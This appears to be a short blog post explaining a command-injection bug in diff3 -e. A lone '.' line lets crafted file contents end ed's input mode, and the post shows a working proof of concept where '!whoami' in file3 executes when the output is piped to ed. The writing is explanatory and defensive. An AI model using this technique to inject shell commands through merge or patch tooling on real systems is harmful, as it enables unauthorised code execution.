up
Don't run diff3 -e on arbitrary files ===================================== From diff3(1): NAME diff3 - 3-way differential file comparison SYNOPSIS diff3 [-3aEeXx] file1 file2 file3 DESCRIPTION The diff3 utility compares the contents of three different versions of a file, file1, file2 and file3, writing the result to the standard output. [...] -e Produces output in a form suitable as an input script for the ed(1) utility. The script may then be used to merge differences common between all three files and differences specific to file1 and file3. In other words, the -e option ignores differences specific to file1 and file2, and those specific to file2 and file3. It is useful for backing out changes specific to file2 only. -x Produces an output script suitable for ed(1) with changes specific only to all three versions. BUGS The -e option cannot catch and change lines which have `.' as the first and only character on the line. The resulting script will fail on that line as `.' is an ed(1) editing command. Hm. So it sounds like diff3 will copy any dots verbatim. The dot causes ed to stop editing, and accept further commands. Of course, ed supports ! to execute shell commands. It's now not too difficult to craft a bad input Create empty file1 and file2. Then create file3 as follows: . !whoami Then: $ diff3 -e file1 file2 file3 1c . !whoami . which is an ed script which will run whoami: $ diff3 -e file1 file2 file3 | ed file1 1 parry ! ? Suppose the lesson here is simple: where there is smoke, there is fire. Bugs are often indicative of security issues.